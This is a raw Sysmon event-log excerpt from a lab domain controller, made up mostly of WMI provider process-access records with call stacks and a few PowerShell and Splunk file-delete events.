T4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.671{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC08B07D544523F488ACD380DE8C231E,SHA256=4EC8AB14F0B8C10343A4B400DADEFAF9532A1965A927525DD433DA1361B590F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.671{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.670{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_iujhpwam.qqx.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_slldyl4f.h3s.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.654{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-C1AA-00000000AD01}11600C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.639{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-C1AA-00000000AD01}11600C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 